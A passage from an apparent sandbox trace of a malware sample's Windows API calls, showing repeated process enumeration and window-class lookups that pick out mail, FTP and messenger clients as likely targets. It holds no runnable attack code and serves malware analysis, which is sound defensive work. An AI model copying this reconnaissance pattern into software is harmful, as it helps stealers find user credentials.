th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.561] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0161.562] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 0 [0161.564] CloseHandle (hObject=0x1060) returned 1 [0161.564] Sleep (dwMilliseconds=0x64) [0161.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1060 [0161.681] Process32First (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.682] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0161.684] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0161.685] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.687] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.688] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.690] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.691] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.693] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.694] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0161.696] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.697] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.699] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.700] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.702] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.703] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.705] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0161.706] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.708] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.709] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.711] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0161.759] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.761] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0161.763] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.764] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x248, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0161.766] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.767] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x53c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0161.769] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="shoot_decade_effect.exe")) returned 1 [0161.771] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="at_effort.exe")) returned 1 [0161.772] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0161.773] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="four.exe")) returned 1 [0161.775] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treatmentabout.exe")) returned 1 [0161.777] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="treat.exe")) returned 1 [0161.779] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="quickly_mention_learn.exe")) returned 1 [0161.780] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="offer_shot.exe")) returned 1 [0161.782] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="total.exe")) returned 1 [0161.783] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="few.exe")) returned 1 [0161.785] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x998, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="our-available-watch.exe")) returned 1 [0161.786] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="reality.exe")) returned 1 [0161.788] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="surface.exe")) returned 1 [0161.789] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrong.exe")) returned 1 [0161.791] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="future employee.exe")) returned 1 [0161.792] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-majority-recognize.exe")) returned 1 [0161.793] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="land-be-area.exe")) returned 1 [0161.795] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="focus_memory_base.exe")) returned 1 [0161.796] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="mrus.exe")) returned 1 [0161.798] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0161.799] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0161.801] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0161.802] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0161.804] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0161.805] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0161.817] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0161.819] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0161.821] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0161.822] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0161.824] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0161.825] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0161.827] Process32Next (in: hSnapshot=0x1060, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0166.368] Process32First (in: hSnapshot=0xb64, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.869] Process32First (in: hSnapshot=0x14c4, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.361] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x41c [0226.370] Process32First (in: hSnapshot=0x41c, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.155] Process32First (in: hSnapshot=0x7e8, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x610 [0257.931] Process32First (in: hSnapshot=0x610, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0261.340] Process32First (in: hSnapshot=0x7e8, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.550] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x610 [0264.561] Process32First (in: hSnapshot=0x610, lppe=0x61dfd00 | out: lppe=0x61dfd00*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 97 os_tid = 0xf60 [0160.871] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) returned 1 [0160.872] GetClassNameA (in: hWnd=0x30122, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0160.872] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0160.872] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0160.872] GetClassNameA (in: hWnd=0x10070, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x10086, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x10078, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x10076, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x10072, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.872] GetClassNameA (in: hWnd=0x10052, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Button") returned 6 [0160.872] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0160.873] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.873] GetClassNameA (in: hWnd=0x50092, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.873] GetClassNameA (in: hWnd=0x10088, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0160.873] GetClassNameA (in: hWnd=0x10268, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Military_mission_finish_window") returned 30 [0160.873] GetClassNameA (in: hWnd=0x201ea, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0160.873] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0160.873] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="notepad_class") returned 13 [0160.873] GetClassNameA (in: hWnd=0x10298, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0160.873] GetClassNameA (in: hWnd=0x10296, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0160.873] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="omniposclass") returned 12 [0160.873] GetClassNameA (in: hWnd=0x10294, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0160.873] GetClassNameA (in: hWnd=0x10292, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="scriptftp_wnd") returned 13 [0160.873] GetClassNameA (in: hWnd=0x10290, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="skypeclass") returned 10 [0160.873] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="smartftp") returned 8 [0160.873] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="thunderbird_") returned 12 [0160.873] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0160.874] GetClassNameA (in: hWnd=0x10288, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="webdrivewin") returned 11 [0160.874] GetClassNameA (in: hWnd=0x10286, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="whatsapp_window") returned 15 [0160.874] GetClassNameA (in: hWnd=0x10284, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="winscpapp") returned 9 [0160.874] GetClassNameA (in: hWnd=0x10282, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0160.874] GetClassNameA (in: hWnd=0x10280, 